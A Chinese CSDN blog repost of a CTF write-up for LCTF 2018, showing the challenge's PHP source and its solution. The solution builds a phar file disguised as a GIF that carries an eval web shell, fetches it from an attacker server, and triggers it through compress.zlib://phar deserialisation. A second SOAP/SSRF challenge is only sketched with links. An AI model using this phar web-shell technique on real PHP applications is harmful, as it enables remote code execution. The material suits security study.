LCTF wp简单复现_weixin_30502965的博客-CSDN博客
来自 : CSDN技术社区 发布时间:2021-03-25

1、T4lk 1s ch34p,sh0w m3 the sh31l

代码如下

 ?php$SECRET ../read_secret $SANDBOX ../data/ . md5($SECRET. $_SERVER[ REMOTE_ADDR ]);$FILEBOX ../file/ . md5( K0rz3n . $_SERVER[ REMOTE_ADDR ]); mkdir($SANDBOX);mkdir($FILEBOX);echo $FILEBOX ;if (!isset($_COOKIE[ session-data ])) { $data serialize(new User($SANDBOX)); $hmac hash_hmac( md5 , $data, $SECRET); setcookie( session-data , sprintf( %s-----%s , $data, $hmac)); }class User { public $avatar; function __construct($path) { $this- avatar $path; }}class K0rz3n_secret_flag { protected $file_path; function __destruct(){ if(preg_match( /(log|etc|session|proc|read_secret|history|class)/i , $this- file_path)){ die( Sorry Sorry Sorry ); } include_once($this- file_path); }}function check_session() { global $SECRET; $data $_COOKIE[ session-data ]; list($data, $hmac) explode( ----- , $data, 2); if (!isset($data, $hmac) || !is_string($data) || !is_string($hmac)){ die( Bye ); } if ( !hash_equals(hash_hmac( md5 , $data, $SECRET), $hmac) ){ die( Bye Bye ); } $data unserialize($data); if ( !isset($data- avatar) ){ die( Bye Bye Bye ); } return $data- avatar;//返回上传路径 }function upload($path) { if(isset($_GET[ url ])){ if(preg_match( /^(http|https).*/i , $_GET[ url ])){ $data file_get_contents($_GET[ url ] . /avatar.gif ); if (substr($data, 0, 6) ! GIF89a ){ die( Fuck off ); } //?m upload url http://vps/avatar.gif file_put_contents($path . /avatar.gif , $data); die( Upload OK ); }else{ die( Hacker ); } }else{ die( Miss the URL~~ ); }}function show($path) { if ( !is_dir($path) || !file_exists($path . /avatar.gif )) { $path /var/www ; } header( Content-Type: image/gif ); die(file_get_contents($path . /avatar.gif )); }function check($path){ if(isset($_GET[ c ])){ if(preg_match( /^(ftp|php|zlib|data|glob|phar|ssh2|rar|ogg|expect)(.|\\\\s)*|(.|\\\\s)*(file)(.|\\\\s)*/i ,$_GET[ c ])){ die( Hacker Hacker Hacker ); }else{ $file_path $_GET[ c ]; list($width, $height, $type) getimagesize($file_path); die( Width is . $width. px br . Height is . $height. 
px br ); } }else{ list($width, $height, $type) getimagesize($path. /avatar.gif ); die( Width is . $width. px br . Height is . $height. px br ); }}function move($source_path,$dest_name){ global $FILEBOX; $dest_path $FILEBOX . / . $dest_name; if(preg_match( /(log|etc|session|proc|root|secret|www|history|file|\\.\\.|ftp|php|phar|zlib|data|glob|ssh2|rar|ogg|expect|http|https)/i ,$source_path)){ die( Hacker Hacker Hacker ); }else{ if(copy($source_path,$dest_path)){ die( Successful copy ); }else{ die( Copy failed ); } }}$mode $_GET[ m ];if ($mode upload ){ upload(check_session());}else if ($mode show ){ show(check_session());}else if ($mode check ){ check(check_session());}else if($mode move ){ move($_GET[ source ],$_GET[ dest ]);}else{ highlight_file(__FILE__); }

1、上传恶意文件，反序列化的时候包含上传的文件。注意：生成的 avatar.gif 不仅可以在反序列化时覆盖上传路径 $file_path，也可以通过 setStub 向恶意文件中写入 PHP 代码，实现文件包含。

?m upload url http://vps/avatar.gif

 ?phpclass K0rz3n_secret_flag { protected $file_path /var/www/data/67bf5ff3cfa1cdd00f700328698c2adb/avatar.gif ; function __destruct(){ if(preg_match( /(log|etc|session|proc|read_secret|history|class)/i , $this- file_path)){ die( Sorry Sorry Sorry ); } include_once($this- file_path); } }$a new K0rz3n_secret_flag();$p new Phar( ./1.phar , 0);$p- startBuffering();$p- setStub( GIF89a ?php echo 1;eval($_GET[ a ? . ?php __HALT_COMPILER(); ? . );$p- setMetadata($a);$p- addFromString( 1.txt , text );$p- stopBuffering();rename( ./1.phar , avatar.gif 

生成的恶意文件

（此处原为图片，抓取时未保留）

 

2、在 check 的时候触发反序列化，通过 compress.zlib://phar 绕过正则。参考链接：https://blog.zsxsoft.com/post/38

 http://212.64.7.171/LCTF.php?m check c compress.zlib://phar:///var/www/data/dccb75e38fe3fc2c70fd169f263e6d37/avatar.gif a phpinfo();

2、bestphp's revenge

通过 Soap 类进行反序列化，进而进行 SSRF。具体参考：https://xz.aliyun.com/t/3339#toc-3 https://xz.aliyun.com/t/3341#toc-22 https://www.anquanke.com/post/id/164569

 参考链接

https://xz.aliyun.com/t/3341#toc-8

https://xz.aliyun.com/t/3339#toc-4

https://xz.aliyun.com/t/3340#toc-3

http://www.k0rz3n.com/2018/11/19/LCTF%202018%20T4lk%201s%20ch34p,sh0w%20m3%20the%20sh31l%20%E8%AF%A6%E7%BB%86%E5%88%86%E6%9E%90/

转载于:https://www.cnblogs.com/afanti/p/9987094.html
